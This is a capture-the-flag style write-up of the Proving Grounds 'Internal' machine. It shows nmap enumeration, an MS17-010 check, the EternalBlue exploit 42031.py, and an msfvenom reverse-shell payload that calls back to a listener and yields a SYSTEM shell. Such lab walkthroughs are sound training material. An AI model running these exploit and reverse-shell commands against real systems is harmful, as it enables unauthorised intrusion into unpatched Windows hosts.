Internal is a machine available in the Practice area of the Offensive Security Proving Grounds. This machine was super easy, so I will be focusing on manual exploitation and solid enumeration.
Reconnaissance
Lets start with some basic enumeration.
kali@kali:~/oscp/offsec/internal$ nmap -sC -sV -oA simple 192.168.177.40 [7/931] Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 21:29 EST Nmap scan report for 192.168.177.40 Host is up (0.065s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.0.6001 (17714650) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: W ORKGROUP) 3389/tcp open ssl/ms-wbt-server? | ssl-cert: Subject: commonName=internal | Not valid before: 2020-11-23T01:30:47 |_Not valid after: 2021-05-25T01:30:47 |_ssl-date: 2020-11-24T02:31:05+00:00; 0s from scanner time. 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2 Host script results: |_clock-skew: mean: 1h59m59s, deviation: 4h00m00s, median: 0s |_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:bf:ae:25 (VMware) | smb-os-discovery: | OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0) | OS CPE: cpe:/o:microsoft:windows_server_2008::sp1 | Computer name: internal | NetBIOS computer name: INTERNAL\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-11-23T18:30:56-08:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-11-24T02:30:57 |_ start_date: 2020-11-24T01:30:44 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 73.36 seconds
Here we immediately see our target is “Windows Server (R) 2008 Standard 6001 Service Pack 1”. We need to check for the well known MS17-010.
kali@kali:~/oscp/offsec/internal$ nmap -p445 --script smb-vuln-ms17-010 192.168.177.40 Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-23 21:35 EST Nmap scan report for 192.168.177.40 Host is up (0.061s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
Here we see the output showing the machine should be vulnerable to Eternal Blue. Lets start poking around.
Weaponization and Delivery
kali@kali:~/oscp/offsec/internal$ searchsploit ms17-010 -------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------- --------------------------------- Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Rem | windows/remote/43970.rb Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010 | windows/remote/42031.py Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code | windows/remote/42315.py Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution | windows_x86-64/remote/42030.py Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execut | windows_x86-64/remote/41987.py -------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
Searchsploit shows a few different options that may work with our target OS. Lets try the “42031.py”.
kali@kali:~/oscp/offsec/internal$ searchsploit -m windows/remote/42031.py Exploit: Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) URL: https://www.exploit-db.com/exploits/42031 Path: /usr/share/exploitdb/exploits/windows/remote/42031.py File Type: Python script, ASCII text executable, with CRLF line terminators Copied to: /home/kali/oscp/offsec/internal/42031.py kali@kali:~/oscp/offsec/internal$ sudo chmod +x 42031.py
Copy the exploit down and change add execute permissions. As always, I reviewed the code looking for any possible additions. Lets execute of the code and see what we need.
kali@kali:~/oscp/offsec/internal$ python 42031.py 42031.py <ip> <shellcode_file> [numGroomConn]
We will need some shellcode and a target. Simple enough. Msvenom time.
kali@kali:~/oscp/offsec/internal$ msfvenom -p windows/shell_reverse_tcp -f raw EXITFUNC=thread LHOST=192.168.49.177 LPORT=7788 -o trenchesofit.bin [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Saved as: trenchesofit.bin
Here I’m generating the payload for a 32 bit system , but if that doesn’t work we can just try 64 bit. I also chose a non-staged payload, again no logic behind this decision, just something to change if the reverse shell fails.
Foothold
Start up the listener.
kali@kali:~/oscp/offsec/internal$ nc -lvnp 7788 listening on [any] 7788 ...
Execute the exploit.
kali@kali:~/oscp/offsec/internal$ python 42031.py 192.168.177.40 trenchesofit.bin shellcode size: 324 numGroomConn: 13 Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success good response status: INVALID_PARAMETER done
Check back on our netcat listener.
kali@kali:~/oscp/offsec/internal$ nc -lvnp 7788 listening on [any] 7788 ... connect to [192.168.49.177] from (UNKNOWN) [192.168.177.40] 49160 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system
Nice!
Conclusion
Overall the “Internal” machine from Offensive Security was a great chance for me to re-visit MS17-010. EternalBlue is known for being a finicky exploit, so I had to execute the payload multiple times before the reverse shell succeeded. Also, if the exploit just doesn’t seem to be working, try resetting the box. When exploiting this vulnerability in the wild, it may be worth trying different architectures and payload types. Persistence is key with this one. Until next time, stay safe in the Trenches of IT!